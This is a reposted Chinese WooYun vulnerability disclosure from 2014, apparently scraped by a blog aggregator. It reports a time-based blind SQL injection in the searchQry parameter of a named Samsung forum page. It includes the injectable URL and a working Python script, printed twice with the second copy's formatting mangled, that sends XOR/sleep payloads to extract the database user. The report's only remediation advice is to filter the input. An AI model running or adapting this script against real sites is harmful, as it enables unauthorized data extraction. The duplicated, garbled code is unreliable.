漏洞概要

缺陷編號：WooYun-2014-082219

漏洞標(biāo)題：三星集團(tuán)某站點MySQL盲注一枚(附python驗證腳本)

相關(guān)廠商：三星集團(tuán)

漏洞作者：lijiejie

提交時間：2014-11-06 10:55

公開時間：2014-12-21 11:02

漏洞類型：SQL注射漏洞

危害等級：高

自評Rank：10

漏洞狀態(tài)：未聯(lián)系到廠商或者廠商積極忽略

Tags標(biāo)簽：

漏洞詳情

披露狀態(tài)：

2014-11-06: 積極聯(lián)系廠商并且等待廠商認(rèn)領(lǐng)中，細(xì)節(jié)不對外公開

2014-12-21: 廠商已經(jīng)主動忽略漏洞，細(xì)節(jié)向公眾公開

簡要描述：

三星集團(tuán)某站點MySQL盲注一枚，猜解速度尚佳，附python驗證腳本。

詳細(xì)說明：

注入點位于：

http://www.sgsg.samsung.com/forum/qna.do?pageNo=1&searchQry=123

1

http://www.sgsg.samsung.com/forum/qna.do?pageNo=1&searchQry=123

參數(shù)searchQry可注入。

漏洞證明：

猜解user，得到：

[email?protected]

1

[email?protected]

驗證腳本：

#encoding=gbk

import httplib

import time

import string

import sys

import random

import urllibheaders = {

'Cookie': '',

'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',

}payloads = list(string.ascii_lowercase)

for i in range(0,10):

payloads.append(str(i))

payloads += ['@','_', '.']print 'start to retrive MySQL user:'

user = ''

for i in range(1,30,1):

for payload in payloads:

try:

conn = httplib.HTTPConnection('www.sgsg.samsung.com', timeout=5)

rand_num = str(random.random())

s = "123'XOR(if(ascii(mid(user()from(%s)for(1)))=%s,sleep(1),0))OR'bbb" % (i, ord(payload) )

conn.request(method='GET',

url='/forum/qna.do?pageNo=1&searchQry=' + urllib.quote(s),

headers = headers)

start_time = time.time()

html_doc = conn.getresponse().read()

conn.close()

print '.',

except:

user += payload

print '\n[in progress]', user

breakprint '\nMySQL user is', user

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

#encoding=gbk

importhttplib

importtime

importstring

importsys

importrandom

importurllibheaders={

'Cookie':'',

'User-Agent':'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',

}payloads=list(string.ascii_lowercase)

foriinrange(0,10):

payloads.append(str(i))

payloads+=['@','_','.']print'start to retrive MySQL user:'

user=''

foriinrange(1,30,1):

forpayloadinpayloads:

try:

conn=httplib.HTTPConnection('www.sgsg.samsung.com',timeout=5)

rand_num=str(random.random())

s="123'XOR(if(ascii(mid(user()from(%s)for(1)))=%s,sleep(1),0))OR'bbb"%(i,ord(payload))

conn.request(method='GET',

url='/forum/qna.do?pageNo=1&searchQry='+urllib.quote(s),

headers=headers)

start_time=time.time()

html_doc=conn.getresponse().read()

conn.close()

print'.',

except:

user+=payload

print'\n[in progress]',user

breakprint'\nMySQL user is',user

修復(fù)方案：

過濾之

漏洞回應(yīng)

廠商回應(yīng)：

未能聯(lián)系到廠商或者廠商積極拒絕

評價

總結(jié)

以上是生活随笔為你收集整理的便携式三星mysql_三星集团某站点MySQL盲注一枚（附python验证脚本）的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。